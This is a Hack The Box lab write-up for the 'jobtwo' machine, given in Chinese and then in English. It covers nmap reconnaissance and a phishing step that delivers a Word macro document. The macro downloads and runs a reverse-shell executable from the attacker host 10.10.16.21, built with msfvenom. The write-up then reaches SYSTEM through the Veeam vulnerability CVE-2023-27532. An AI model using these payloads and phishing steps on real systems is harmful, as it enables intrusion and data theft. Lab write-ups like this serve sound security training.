htb jobtwo

Information Gathering

# Nmap 7.98 scan initiated Sun Jan  4 14:03:38 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.238.35
Nmap scan report for 10.129.238.35
Host is up (0.17s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| tls-alpn:
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Issuer: commonName=www.job2.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-09T13:31:40
| Not valid after:  2122-05-09T13:41:37
| MD5:     c9f2 9528 e037 427f 18a4 25df 8a09 9bcb
| SHA-1:   a8ea cfdd 9e76 ba15 d11e 9b86 90b3 91c0 a6d8 6084
|_SHA-256: db18 1035 4d3e bc36 30f4 bf54 0f97 e545 b58c de74 e66a 54f8 fefc 425b b1dc 4afb
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
1063/tcp  open  rpcbind
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=JOB2
| Issuer: commonName=JOB2
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-26T11:44:40
| Not valid after:  2026-04-27T11:44:40
| MD5:     bf8d 2c65 9d12 408e 3c34 855e 2d4c c869
| SHA-1:   8c1b 5175 aa80 1ba5 730d 4ba2 71a6 62a5 c31a b834
|_SHA-256: 3e3c 7325 baeb 35f9 1501 ab98 6577 a9f9 299c ab16 5bc2 97b8 0c9d c27e fa0b 9a9a
|_ssl-date: 2026-01-04T15:06:32+00:00; +1h00m00s from scanner time.
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.081 days (since Sun Jan  4 12:09:36 2026)
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-01-04T15:05:52
|_  start_date: N/A
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  4 14:06:39 2026 -- 1 IP address (1 host up) scanned in 180.97 seconds

Vulnerability Analysis

进入https://www.job2.vl/,可以看到

"If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document."

Exploitation (User Flag)

创建一个docm的word文件

alt+F11,输入VBS宏

Sub AutoOpen()

  a = Shell("""curl"" ""10.10.16.21/shell.exe"" ""-o"" ""C:\Windows\tasks\shell.exe""", vbHide)
  b = Shell("C:\Windows\tasks\shell.exe", vbHide)

End Sub
# 要发两次,第一次下载第二次执行

本地创建rcat.exe反向shell文件

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f exe -o shell.exe

发送邮件

sendemail -s job2.vl -f "Neobee@gmail.htb" -t hr@job2.vl -m "hey pls check my cv http://10.10.16.21/" -a 1.docm -o tls=no

即可得到job2\julian的shell

Privilege Escalation (Root Flag)

net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand
Guest                    Julian                   svc_veeam
WDAGUtilityAccount
The command completed with one or more errors.

得到svc_veeam,可知目标安装着Veeam Backup & Replication 软件

检查是否运行着veeam

tasklist /svc | findstr /i "veeam"
tasklist /svc | findstr /i "veeam"
sqlservr.exe                  2464 MSSQL$VEEAMSQL2016
sqlceip.exe                   2764 SQLTELEMETRY$VEEAMSQL2016
Veeam.Backup.Agent.Config     3472 VeeamDistributionSvc
VeeamFilesysVssSvc.exe        3480 VeeamFilesysVssSvc
VeeamDeploymentSvc.exe        3496 VeeamDeploySvc
VeeamTransportSvc.exe         3504 VeeamTransportSvc
VeeamNFSSvc.exe               3512 VeeamNFSSvc
Veeam.Guest.Interaction.P     4008 N/A
Veeam.Backup.Service.exe      3120 VeeamBackupSvc
Veeam.Backup.BrokerServic     6392 VeeamBrokerSvc
Veeam.Backup.ExternalInfr      944 N/A
Veeam.Backup.Manager.exe      3928 N/A
Veeam.Backup.WmiServer.ex     8692 N/A
Veeam.Backup.CatalogDataS     9144 VeeamCatalogSvc
Veeam.Backup.CloudService     7368 VeeamCloudSvc
Veeam.Backup.UIServer.exe     8392 N/A
Veeam.Backup.MountService     7256 VeeamMountSvc

因为可以访问本地的网络,所以可以尝试CVE-2023-27532

上传四个文件

07/10/2024  11:34 AM         1,841,232 Veeam.Backup.Common.dll
07/10/2024  11:34 AM           430,160 Veeam.Backup.Interaction.MountService.dll
07/10/2024  11:34 AM         4,444,240 Veeam.Backup.Model.dll
07/10/2024  11:34 AM             7,168 VeeamHax.exe

运行

C:\Users\Julian\Documents>.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
Targeting 127.0.0.1:9401

即可获得shell

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Lessons Learned

被遗忘的 .NET Remoting

1. 核心背景:被遗忘的 .NET Remoting

要理解这个漏洞,首先要理解 .NET Remoting

  • 这是什么? 这是一个微软在 .NET Framework 早期(2002年左右)推出的技术,允许不同进程(Process)或不同机器上的程序对象进行通信。你可以把它想象成“远程过程调用 (RPC)”的一种老式实现。
  • 为什么危险? 微软多年前就已弃用该技术,并建议改用 WCF 或 REST API。原因在于 .NET Remoting 极其依赖 反序列化 (Deserialization),且默认配置往往缺乏严格的安全边界。

Veeam 的失误: Veeam Backup & Replication (VBR) 的核心服务(Veeam.Backup.Service.exe)为了方便各个组件(如 UI 控制台、挂载服务等)互相通讯,在 TCP 端口 9392 上开启了一个 .NET Remoting 监听器。

2. 漏洞成因:未认证的 API 暴露

CVE-2023-27532 本质上是一个 认证绕过 (Authentication Bypass) 漏洞,它分为两个主要利用方向:

A. 凭据窃取 (Credential Dumping) - 逻辑漏洞

这是最常见的利用方式。

  1. 正常流程:管理员通过控制台登录,Veeam 服务验证身份后,允许管理员查询数据库配置。
  2. 漏洞点:Veeam 在 9392 端口暴露了一个名为 IVeeamService(或类似的内部接口)的端点。开发者错误地认为只有经过身份验证的内部组件才会连接这个端口,因此没有对某些特定的 API 调用进行身份检查。
  3. 攻击逻辑
    • 攻击者连接到 9392 端口。
    • 直接请求 CredentialsDbScopeId 对象。
    • Veeam 服务不检查你是谁,直接把数据库中存储的凭据(虽然是加密的)发给你。
    • 由于 Veeam 的静态解密算法是硬编码或可逆的,攻击者可以在本地轻松将其解密为明文密码(Administrator/SQL 密码)。

B. 远程代码执行 (RCE) - 反序列化漏洞

这是你刚才使用的利用方式(通过 9401 端口拿到 Shell)。

  1. 原理:.NET Remoting 通信依赖于 BinaryFormatter。当服务器接收到客户端发来的数据对象时,它会自动进行“反序列化”(把二进制数据还原成内存中的对象)。
  2. 危险的 BinaryFormatter:微软明确警告过 BinaryFormatter 是不安全的。如果攻击者发送一个恶意的、特制的序列化对象,服务器在还原这个对象的过程中,会触发对象内部定义的恶意代码。
  3. 攻击逻辑
    • 你的利用工具 (VeeamHax.exe) 连接到 Mount Service (9401)。
    • 它没有发送正常的请求,而是发送了一段构造好的恶意序列化数据(Gadget Chain)。
    • Veeam 服务尝试读取这段数据时,触发了代码执行,从而运行了你指定的 shell.exe

3. 为什么你在 Localhost 攻击成功?

这涉及到网络架构的安全边界。

  • 外部防御:在真实的企业环境中,管理员通常会在防火墙上封禁 9392/9401 端口,导致外部攻击者无法直接利用。
  • 内部防御缺失:但是,软件通常默认信任 Localhost (127.0.0.1)
  • 攻击路径
    1. 你首先通过其他漏洞或弱口令获得了低权限用户 Julian
    2. 一旦进入系统内部,防火墙对 127.0.0.1 的流量通常是不设防的。
    3. 你通过本地回环地址连接漏洞端口,对于 Veeam 服务来说,这个请求看起来像是“本机其他组件”发起的,因此更容易通过(或者仅仅是因为网络可达了)。

htb jobtwo

Information Gathering

Nmap 7.98 scan initiated on Sunday, January 4, 2026, at 14:03:38, with the following command:

/usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.238.35
Nmap scan report for 10.129.238.35:
The host is online (latency: 0.17 seconds).
985 TCP ports were not displayed because no response was received.

Port Information:

PortStateServiceVersion
22/tcpOpensshOpenSSH for Windows 9.5 (Protocol 2.0)
25/tcpOpensmtphMailServer smtpd
80/tcpOpenhttpMicrosoft HTTPAPI (SSDP/UPnP)
111/tcpOpenrpcbindMicrosoft Windows RPC
135/tcpOpenmsrpcMicrosoft Windows RPC
139/tcpOpennetbios-ssnMicrosoft Windows netbios-ssn
443/tcpOpenssl/https?(TLS with H2 protocol)
445/tcpOpenmicrosoft-ds?Unknown service
1063/tcpOpenrpcbind
2049/tcpOpenrpcbind
3389/tcpOpenms-wbt-serverMicrosoft Terminal Services
5985/tcpOpenhttpMicrosoft HTTPAPI (SSDP/UPnP)

Additional Information:

  • The host’s OS type is likely Microsoft Windows (89% probability).
  • Uptime: approximately 0.081 days (since January 4, 2026, 12:09:36).
  • TCP sequence prediction difficulty: 249 (challenging).
  • Service information: Host: JOB2; OS: Windows; CPE: Microsoft Windows Server.

Notes:

  • Some ports (e.g., 985) were not displayed due to no response.
  • The SSL certificate details are included for each open port.

Host script results: | smb2-security-mode: | 3.1.1: |_ Message signing is enabled but not required. | smb2-time: | Date: 2026-01-04T15:05:52 |_ Start date: N/A |_ Clock skew: Mean: 59 minutes and 59 seconds; Deviation: 0 seconds; Median: 59 minutes and 59 seconds

Data files were read from: /usr/share/nmap OS and service detection was performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap Results

Nmap was executed on Sunday, January 4, 2026, at 14:06:39. One IP address (1 host) was scanned in 180.97 seconds.

Vulnerability Analysis

By visiting https://www.job2.vl/, it is stated that: “If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document.”

Exploitation (User Flag)

Create a Word document with the extension .docm. Press Alt+F11 to activate the Visual Basic for Applications (VBA) macro editor and insert the following code:

Sub AutoOpen()
  a = Shell("curl '10.10.16.21/shell.exe' -o C:\Windows\tasks\shell.exe", vbHide)
  b = Shell("C:\Windows\tasks\shell.exe", vbHide)
End Sub

This macro will attempt to download and execute the shell.exe file twice.

Next, create a reverse shell file (rcat.exe) locally using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f exe -o shell.exe

Finally, send an email to hr@job2.vl with the attached .docm file:

sendemail -s job2.vl -f "Neobee@gmail.htb" -t hr@job2.vl -m "Hey, please check my CV at http://10.10.16.21/" -a 1.docm -o tls=no

This will allow you to gain access to the system of job2\julian through the created reverse shell.

Privilege Escalation (Root Access)

net users
User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand
Guest                    Julian                   svc_veeam
WDAGUtilityAccount

The command completed with one or more errors.

From this information, we can determine that the target system has the **Veeam Backup & Replication** software installed.

Let's check if the `veeam` service is running:
```bash
tasklist /svc | findstr /i "veeam"

Output:

tasklist /svc | findstr /i "veeam"
sqlservr.exe                  2464 MSSQL$VEEAMSQL2016
sqlceip.exe                   2764 SQLTELEMETRY$VEEAMSQL2016
Veeam.Backup.Agent.Config     3472 VeeamDistributionSvc
VeeamFilesysVssSvc.exe        3480 VeeamFilesysVssSvc
VeeamDeploymentSvc.exe        3496 VeeamDeploySvc
VeeamTransportSvc.exe         3504 VeeamTransportSvc
VeeamNFSSvc.exe               3512 VeeamNFSSvc
Veeam.Guest.Interaction.P     4008 N/A
Veeam.Backup.Service.exe      3120 VeeamBackupSvc
Veeam.Backup.BrokerServic     6392 VeeamBrokerSvc
Veeam.Backup.ExternalInfr      944 N/A
Veeam.Backup.Manager.exe      3928 N/A
Veeam.Backup.WmiServer.ex     8692 N/A
Veeam.Backup.CatalogDataS     9144 VeeamCatalogSvc
Veeam.Backup.CloudService     7368 VeeamCloudSvc
Veeam.Backup.UIServer.exe     8392 N/A
Veeam.Backup.MountService     7256 VeeamMountSvc

Since we have access to the local network, we can attempt to exploit the vulnerability CVE-2023-27532.

We will upload four files:

07/10/2024  11:34 AM         1,841,232 Veeam.Backup.Common.dll
07/10/2024  11:34 AM           430,160 Veeam.Backup.Interaction.MountService.dll
07/10/2024  11:34 AM         4,444,240 Veeam.Backup.Model.dll
07/10/2024  11:34 AM             7,168 VeeamHax.exe

Then, we execute the following commands:

C:\Users\Julian\Documents>.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
Targeting 127.0.0.1:9401

This should grant us shell access to the target system:

C:\WINDOWS\system32> whoami
whoami
nt authority\system

Lessons Learned:

It’s important to be aware of overlooked .NET Remoting vulnerabilities that can still be exploited to gain elevated privileges.


## 1. Core Background: The Forgotten .NET Remoting

To understand this vulnerability, it’s essential to first understand **.NET Remoting**.

- **What is it?** This is a technology introduced by Microsoft in the early days of the .NET Framework (around 2002) that allowed program objects on different processes or machines to communicate with each other. You can think of it as a legacy implementation of “Remote Procedure Call (RPC).”
- **Why is it dangerous?** Microsoft deprecated this technology years ago and recommended using WCF or REST APIs instead. The reason is that .NET Remoting relies heavily on **deserialization**, and its default configuration often lacks strict security measures.

**Veeam’s Mistake:**
The core service of Veeam Backup & Replication (VBR), `Veeam.Backup.Service.exe`, enables a .NET Remoting listener on TCP port **9392** to facilitate communication between various components, such as the UI console and mounting services.

## 2. The Vulnerability: Unauthenticated API Exposure

CVE-2023-27532 is essentially an **authentication bypass** vulnerability, which can be exploited in two main ways:

### A. Credential Dumping - A Logical Vulnerability

This is the most common method of exploitation:

1. **Normal Process:** An administrator logs in through the console, and after verification, the Veeam service allows the administrator to query database configurations.
2. **Vulnerability:** Veeam exposes an endpoint named `IVeeamService` (or a similar internal interface) on port 9392. The developers **mistakenly believed** that only authenticated internal components would connect to this port, so they did not perform identity checks on certain API calls.
3. **Attack Logic:**
    - The attacker connects to port 9392.
    - They directly request the `CredentialsDbScopeId` object.
    - The Veeam service **does not verify the identity** and simply sends the credentials stored in the database (although they are encrypted) to the attacker.
    - Since Veeam’s encryption algorithm is either hardcoded or reversible, the attacker can easily decrypt the credentials (Administrator/SQL passwords) locally.

### B. Remote Code Execution (RCE) - A Deserialization Vulnerability

This is the method you used in the exploit (by obtaining a shell through port 9401):

1. **Principle:** .NET Remoting communication relies on `BinaryFormatter`. When the server receives a data object from the client, it automatically performs deserialization (reverting the binary data back into an object in memory).
2. **The Dangerous BinaryFormatter:** Microsoft has explicitly warned that `BinaryFormatter` is insecure. If an attacker sends a maliciously crafted serialized object, the server will execute the malicious code defined within that object when it tries to deserialize it.
3. **Attack Logic:**
    - Your exploit tool (`VeeamHax.exe`) connects to the Mount Service (port 9401).
    - Instead of sending a normal request, it sends a specially crafted serialized payload (a “gadget chain”).
    - When the Veeam service tries to read this data, it executes the malicious code, which in turn runs the `shell.exe` you specified.

---

## 3. Why Did the Attack Work on Localhost?

This involves the security boundaries of the network architecture:

- **External Defense:** In a real enterprise environment, administrators usually block ports 9392/9401 on the firewall, preventing external attackers from exploiting these ports.
- **Internal Defense Gap:** However, software typically trusts **Localhost (127.0.0.1)** by default.
- **Attack Path:**
    - You first obtain low-privilege user `Julian` through another vulnerability or a weak password.
    - Once inside the system, the firewall usually does not restrict traffic from `127.0.0.1`.
    - You connect to the vulnerable port using the local loopback address. To the Veeam service, this request appears to be coming from another “local component,” making it easier to pass through (or it may simply be network-accessible).